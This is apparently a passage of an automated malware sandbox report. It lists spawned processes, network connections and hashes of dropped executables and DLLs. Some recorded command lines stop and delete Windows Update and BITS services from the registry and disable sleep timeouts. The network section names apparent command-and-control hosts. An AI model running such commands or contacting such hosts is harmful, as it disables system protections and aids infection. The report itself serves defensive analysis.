'C:\Program Files\Notepad\Chrome\updater.exe' }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f

C:\Users\Admin\AppData\Roaming\cujrtgb

C:\Users\Admin\AppData\Roaming\cujrtgb

C:\Users\Admin\AppData\Roaming\afjrtgb

C:\Users\Admin\AppData\Roaming\afjrtgb

C:\Users\Admin\AppData\Local\Temp\FF40.exe

"C:\Users\Admin\AppData\Local\Temp\FF40.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

"C:\Users\Admin\AppData\Local\Temp\1A9E.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\2E69.exe

"C:\Users\Admin\AppData\Local\Temp\2E69.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\C78A.exe

C:\Users\Admin\AppData\Local\Temp\C78A.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 868 -ip 868

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 126.210.247.8.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 potunulit.org udp
US 104.21.18.99:80 potunulit.org tcp
US 8.8.8.8:53 colisumy.com udp
IR 80.210.25.252:80 colisumy.com tcp
US 8.8.8.8:53 99.18.21.104.in-addr.arpa udp
US 8.8.8.8:53 252.25.210.80.in-addr.arpa udp
US 8.8.8.8:53 nordskills.eu udp
PS 213.6.54.58:443 nordskills.eu tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 api.2ip.ua udp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
US 8.8.8.8:53 254.217.0.162.in-addr.arpa udp
IR 80.210.25.252:80 colisumy.com tcp
US 8.8.8.8:53 101.14.18.104.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
IR 80.210.25.252:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
PS 213.6.54.58:443 nordskills.eu tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 greenbi.net udp
MX 189.232.51.144:80 greenbi.net tcp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
MX 189.232.51.144:80 greenbi.net tcp
US 8.8.8.8:53 144.51.232.189.in-addr.arpa udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
MX 189.232.51.144:80 greenbi.net tcp
US 104.21.18.99:80 potunulit.org tcp
MX 189.232.51.144:80 greenbi.net tcp
IR 80.210.25.252:80 colisumy.com tcp
NL 162.0.217.254:443 api.2ip.ua tcp
NL 162.0.217.254:443 api.2ip.ua tcp
US 8.8.8.8:53 254.178.238.8.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp
MX 189.232.51.144:80 greenbi.net tcp
MX 189.232.51.144:80 greenbi.net tcp

Files

memory/2696-134-0x0000000002520000-0x0000000002620000-memory.dmp

memory/2696-135-0x0000000000400000-0x000000000246F000-memory.dmp

memory/2696-136-0x00000000041B0000-0x00000000041B9000-memory.dmp

memory/3188-137-0x0000000000D90000-0x0000000000DA6000-memory.dmp

memory/2696-138-0x0000000000400000-0x000000000246F000-memory.dmp

memory/3188-144-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-145-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-146-0x0000000002F80000-0x0000000002F90000-memory.dmp

memory/3188-147-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-148-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-149-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-150-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-151-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-153-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-154-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-156-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-155-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-157-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/3188-158-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-159-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-160-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/3188-161-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-163-0x0000000002F80000-0x0000000002F90000-memory.dmp

memory/3188-165-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-167-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-162-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-169-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-171-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

memory/3188-170-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-172-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-173-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-174-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-175-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-176-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-179-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-178-0x0000000002F70000-0x0000000002F80000-memory.dmp

memory/3188-177-0x0000000002F70000-0x0000000002F80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FF40.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\FF40.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\154.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/2700-189-0x00000000042C0000-0x00000000043DB000-memory.dmp

memory/2700-187-0x0000000004140000-0x00000000041D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\26E.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4848-193-0x0000000002050000-0x0000000002184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\154.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

C:\Users\Admin\AppData\Local\Temp\154.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4848-199-0x00000000003F0000-0x00000000003F6000-memory.dmp

memory/4080-202-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3880-203-0x0000000002040000-0x0000000002174000-memory.dmp

memory/4080-206-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FF40.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/3880-204-0x0000000000800000-0x0000000000806000-memory.dmp

memory/4080-207-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\667.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

C:\Users\Admin\AppData\Local\Temp\667.exe

MD5 c9de9148f899b175350adb5cd3d077e5
SHA1 9de7bf5a1f2bed9a48e505e88efdd164453afc44
SHA256 c792eb7144a343e7d3b9036a0df4381353c265e5574522687b2df0be2685fc6e
SHA512 ce786835569989c36820217cd4594f02d0aa9cb2602587dc5da3b38fa8cfda24b98930b635f777bfa8219e46f44a243a056c0b758ab90d748a7b75464e76ed43

memory/3880-198-0x0000000002040000-0x0000000002174000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\26E.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4848-196-0x0000000002050000-0x0000000002184000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\26E.dll

MD5 f81fc87a82e628512761653d103abfba
SHA1 7e0e4ff9fcde5fbbf2ab8f93c713f62aeed2b822
SHA256 aee1d02d1d2a22610d3c7f9ab4dc78f1d2ff27c1c3b3dc663faf7fd3795c110d
SHA512 2dbbc6f75aada85f2822e63b6e481f0df121774a7e737a8df5f182d8092fb3795f9c5ecc3588b072afb6be812ec972447530995af00a956532f971acc8d67e1f

memory/4080-194-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CD0.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

C:\Users\Admin\AppData\Local\Temp\CD0.exe

MD5 c43cbad7257cba5352f8b9eaa19c7709
SHA1 04179590b7da86e2bc79425d544d347c7de7b0fc
SHA256 f0c7026d5e40c38d3ce5ca2669f57da25992dff637753b0220a66994decadde4
SHA512 a14c05344d6f9279d733b23d3dbc8e3a8b06b4114976f508d7336ad7aeddd6a532fa27c65f8e34593e4d8f84aa1874d53b960f72a1ac45a2b7c514f57cbae0e8

memory/4356-217-0x00000000001A0000-0x0000000000624000-memory.dmp

memory/4356-216-0x0000000073AC0000-0x0000000074270000-memory.dmp

memory/1048-222-0x0000000000500000-0x0000000000509000-memory.dmp

memory/1048-224-0x0000000000400000-0x00000000004BB000-memory.dmp

memory/1048-221-0x0000000000530000-0x0000000000630000-memory.dmp

memory/4848-226-0x00000000023B0000-0x00000000024AB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/4848-236-0x00000000024B0000-0x0000000002591000-memory.dmp

memory/4848-238-0x00000000024B0000-0x0000000002591000-memory.dmp

memory/4780-246-0x00007FF6C3720000-0x00007FF6C37B7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/4848-248-0x00000000024B0000-0x0000000002591000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 1aa31a69c809b61505813ebcb6486efa
SHA1 77e08b93154d5d49ad845ced0ab9ab8a397ae106
SHA256 ce076279c960afa7f3d9f645567b09dc23f77a5bb45424dc77a90c19dcbb82a4
SHA512 6702e6c51995bb5884d7c0f3ab5363c2b4b1fae852dba0b9d181ae5bf925ef78020dc9904380e581d6fcb7e805c2749b83d4d8da33df457f2ff607c6e25e7cd8

memory/3880-251-0x00000000023A0000-0x000000000249B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1722.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\1722.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/4356-269-0x0000000073AC0000-0x0000000074270000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1722.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/4848-261-0x00000000024B0000-0x0000000002591000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/3880-287-0x00000000024A0000-0x0000000002581000-memory.dmp

memory/3880-291-0x00000000024A0000-0x0000000002581000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1D00.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1496-297-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1496-300-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3880-301-0x00000000024A0000-0x0000000002581000-memory.dmp

memory/1496-303-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3188-307-0x0000000008670000-0x0000000008686000-memory.dmp

memory/4084-306-0x00000000041F0000-0x000000000428F000-memory.dmp

memory/4084-308-0x0000000004290000-0x00000000043AB000-memory.dmp

memory/4196-314-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1A9E.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/4196-310-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4196-317-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4804-316-0x0000000004200000-0x0000000004292000-memory.dmp

memory/1580-321-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 debbf14f3483068c85dbb41089275387
SHA1 53c67f0496489a8bf83e645035b9e030fe22f052
SHA256 d62934313eec30d6276854f81ed0ad0fa455c13032f23c49dc5e931e53aa24fd
SHA512 ef0f3231d777612c12fa32f6d9fd8c24f3147ab0d44e660ceb86d6cd43120be1396ae351d14305ad41d10799cb1fba9ae7626e6970ec840f4e30b4934a49971d

memory/4452-328-0x00000000041B0000-0x000000000424D000-memory.dmp

C:\Users\Admin\AppData\Local\426bb5c0-c9fc-47c8-832c-c6a9c770bcc9\FF40.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\29F2.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

C:\Users\Admin\AppData\Local\Temp\1F05.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1820-337-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\29F2.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/4080-341-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4780-343-0x0000000003510000-0x0000000003680000-memory.dmp

memory/4780-344-0x0000000003680000-0x00000000037B1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2CB3.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

memory/324-350-0x0000000002780000-0x0000000002821000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E69.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1496-353-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2E69.exe

MD5 329d7c6568113a9cc2904037638bb518
SHA1 1044bb723ad24a89bab8875879db06ac4435362d
SHA256 27a2a14ddca16851acaddb42a20201ed175878c868e1ecc7499a3fd4cf4eaa55
SHA512 9435e7c88033b1fb34508027e9354d2c6ff393b26311644ad9c94de2c22e98971f019b9457938bc37bcb76b3697d82da1d14baac8dd3b12db2563705d6aeee73

memory/1820-345-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1148-356-0x0000000002340000-0x0000000002473000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2CB3.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

C:\Users\Admin\AppData\Local\Temp\2CB3.dll

MD5 7292b17c8fa8000b5d7c36279669f96e
SHA1 ca0d9ce9d737bde5a2e1a1639cd9e3762f7c9a1b
SHA256 b2f3ad76def35672309bb9ef2f951b58d37d5010327cbe70b89d756c01d22fc2
SHA512 37d0f05b96b2c837b5cdbe98b160a2168c2d2da2c470f60ab749c4a3fed236c08e47e8ced9a5e799a980ccfa9e362b3d343e28fd36db26ee99dcb8e8f7bbd5e1

memory/3796-361-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1820-338-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1148-362-0x0000000000B20000-0x0000000000B26000-memory.dmp

memory/1496-365-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1148-363-0x0000000002340000-0x0000000002473000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\29F2.exe

MD5 a356ca2c24a9d156641f4140d5d8f9db
SHA1 75be657cab68221785bcaf8c16cf5d7dc81e0961
SHA256 0ac65da52d7a63e098d05b33da91b1e26a9d6b2d47cb0b40112dba5020ea8dc5
SHA512 899facb28a19186a189aad5fdab1426a9a52d1e5d11bb3b85f59c45a94e8891a718fe02e5672399586b004360b4bc8f6c41bdea0019a8d093153ec085cfbc934

memory/1580-329-0x0000000000400000-0x0000000000537000-memory.dmp

memory/1580-327-0x0000000000400000-0x0000000000537000-memory.dmp

memory/4196-326-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

MD5 e8988c1944f23433da970217687454bd
SHA1 4d4f27bd0db3dfb7121985ae00ea1f5b4e0ca8bd
SHA256 0b9ca0015d78763e958b0f0d929dccd09e7d1ac300757552e3c87d9abb15b822
SHA512 1ef8a21173da2c52622a7efdf695483c4ab4237cc6c4a7b64806ca713062b140e4a36348c7afeaccd2b64c2252e613ca38f9273b3a384373083baccbf0f28489

